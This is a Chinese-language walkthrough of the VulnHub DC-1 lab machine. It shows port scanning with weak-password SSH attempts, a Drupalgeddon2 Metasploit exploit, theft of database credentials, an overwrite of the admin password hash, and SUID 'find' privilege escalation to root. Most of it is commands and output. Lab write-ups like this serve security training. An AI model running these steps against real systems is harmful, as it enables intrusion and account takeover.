vulnhub-DC-1 信息收集 老规矩先用fscan扫一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 └─# ./fscan -h 192.168.20.136 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.4 start infoscan 192.168.20.136:80 open 192.168.20.136:22 open [*] alive ports len is: 2 start vulscan [*] WebTitle http://192.168.20.136 code:200 len:7627 title:Welcome to Drupal Site | Drupal Site 已完成 0/2 [-] ssh 192.168.20.136:22 root admin@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 1/2 [-] ssh 192.168.20.136:22 root qwe123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 1/2 [-] ssh 192.168.20.136:22 root Aa12345. ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 1/2 [-] ssh 192.168.20.136:22 admin admin@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 1/2 [-] ssh 192.168.20.136:22 admin a11111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 2/2
漏洞利用 看到80端口有Drupal服务,搜一下漏洞,发现一个Drupal 远程代码执行漏洞(CVE-2018-7600),但是执行不了,用指纹识别试试,发现是Drupal7,去msf利用
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 msf6 > search Drupal Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution 1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection 2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection 3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection 4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution 5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE 6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration 7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval
这里用exploit/unix/webapp/drupal_drupalgeddon2可以打进去
1 2 3 4 use 1 set RHOSTS 192.168.20.136 run shell
美化一下shell
1 python -c "import pty;pty.spawn('/bin/bash')"
ls可以发现有flag1.txt
1 2 cat flag1.txt Every good CMS needs a config file - and so do you.
提示配置文件,刚刚ls的时候可以发现一个sites文件夹,打开能发现有配置文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 www-data@DC-1:/var/www$ cd sites cd sites www-data@DC-1:/var/www/sites$ ls ls README.txt all default example.sites.php www-data@DC-1:/var/www/sites$ cd default cd default www-data@DC-1:/var/www/sites/default$ ls ls default.settings.php files settings.php www-data@DC-1:/var/www/sites/default$ cat settings.php cat settings.php <?php /** * * flag2 * Brute force and dictionary attacks aren't the * only ways to gain access (and you WILL need access). * What can you do with these credentials? * */ $databases = array ( 'default' => array ( 'default' => array ( 'database' => 'drupaldb', 'username' => 'dbuser', 'password' => 'R0ck3t', 'host' => 'localhost', 'port' => '', 'driver' => 'mysql', 'prefix' => '', ), ), );
有flag2,这里也爆出来数据库的用户密码,尝试登录数据库
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 mysql -udbuser -pR0ck3t mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | drupaldb | +--------------------+ 2 rows in set (0.02 sec) mysql> use drupaldb; use drupaldb; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; show tables; +-----------------------------+ | Tables_in_drupaldb | +-----------------------------+ | actions | | authmap | | batch | | block | | block_custom | | block_node_type | | block_role | | blocked_ips | | cache | | cache_block | | cache_bootstrap | | cache_field | | cache_filter | | cache_form | | cache_image | | cache_menu | | cache_page | | cache_path | | cache_update | | cache_views | | cache_views_data | | comment | | ctools_css_cache | | ctools_object_cache | | date_format_locale | | date_format_type | | date_formats | | field_config | | field_config_instance | | field_data_body | | field_data_comment_body | | field_data_field_image | | field_data_field_tags | | field_revision_body | | field_revision_comment_body | | field_revision_field_image | | field_revision_field_tags | | file_managed | | file_usage | | filter | | filter_format | | flood | | history | | image_effects | | image_styles | | menu_custom | | menu_links | | menu_router | | node | | node_access | | node_comment_statistics | | node_revision | | node_type | | queue | | rdf_mapping | | registry | | registry_file | | role | | role_permission | | search_dataset | | search_index | | search_node_links | | search_total | | semaphore | | sequences | | sessions | | shortcut_set | | shortcut_set_users | | system | | taxonomy_index | | taxonomy_term_data | | taxonomy_term_hierarchy | | taxonomy_vocabulary | | url_alias | | users | | users_roles | | variable | | views_display | | views_view | | watchdog | +-----------------------------+ 80 rows in set (0.00 sec)
数据库篡改 发现users表,看看用户
1 2 3 4 5 6 7 8 9 10 11 12 mysql> select * from users; select * from users; +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+ | uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data | +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+ | 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL | | 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; | | 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; | | 3 | 1 | $S$Dd.OLUkeleQbecNnYq0gJUdyRemoXxiU2Qu1WwQoJ4BIOyAw7LH. | aaa@qq.com | | | filtered_html | 1731440313 | 0 | 0 | 0 | Australia/Melbourne | | 0 | aaa@qq.com | NULL | +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+ 4 rows in set (0.00 sec)
有管理员用户密码,但是是加密的,一眼hash,我用hashcat爆破很久没爆破出来,猜测有加密脚本
1 2 3 4 5 www-data@DC-1:/var/www/sites/default$ find / -name "*hash*" find / -name "*hash*" /etc/dictionaries-common/default.hash /boot/grub/hashsum.mod /var/www/scripts/password-hash.sh
果然有,这里直接执行一下,看生成admin
1 2 3 4 www-data@DC-1:/var/www$ php scripts/password-hash.sh admin php scripts/password-hash.sh admin password: admin hash: $S$Dx2t32N4VwlcrmoJ7EZDaq96snnt4p1VEt0CFhN.r1osEN0DkKpx
在数据库改一下密码
1 mysql> update users set pass='$S$DyyA5HnUonyq8xJJZeWKGIsIxaDpzGM6jbKqPiERZ/lLMnsWkUB.' where name='admin';
直接去登录,admin:admin,发现有flag3
1 Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
提示passwd和shadow,去看看
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 www-data@DC-1:/var/www$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:104::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false messagebus:x:103:107::/var/run/dbus:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
有flag4,取到flag4
1 2 3 4 5 6 7 8 9 10 www-data@DC-1:/var/www$ cd /home/flag4 cd /home/flag4 www-data@DC-1:/home/flag4$ ls ls flag4.txt www-data@DC-1:/home/flag4$ cat flag* cat flag* Can you use this same method to find or access the flag in root? Probably. But perhaps it's not that easy. Or maybe it is?
提权 提示root用户,那么就是提权了,先尝试sudo,发现不存在,再试试suid
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 www-data@DC-1:/home/flag4$ find / -perm -u=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null /bin/mount /bin/ping /bin/su /bin/ping6 /bin/umount /usr/bin/at /usr/bin/chsh /usr/bin/passwd /usr/bin/newgrp /usr/bin/chfn /usr/bin/gpasswd /usr/bin/procmail /usr/bin/find /usr/sbin/exim4 /usr/lib/pt_chown /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /sbin/mount.nfs
有find可以提权
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 www-data@DC-1:/var/www$ find . -exec /bin/sh \; find . -exec /bin/sh \; # whoami whoami root # cd /root cd /root # ls ls thefinalflag.txt # cat thefinalflag.txt cat thefinalflag.txt Well done!!!! Hopefully you've enjoyed this and learned some new skills. You can let me know what you thought of this little journey by contacting me via Twitter - @DCAU7
至此,此靶机打完,还是挺简单的,都是基础,主要考点应该就是对与已知漏洞利用以及suid提权
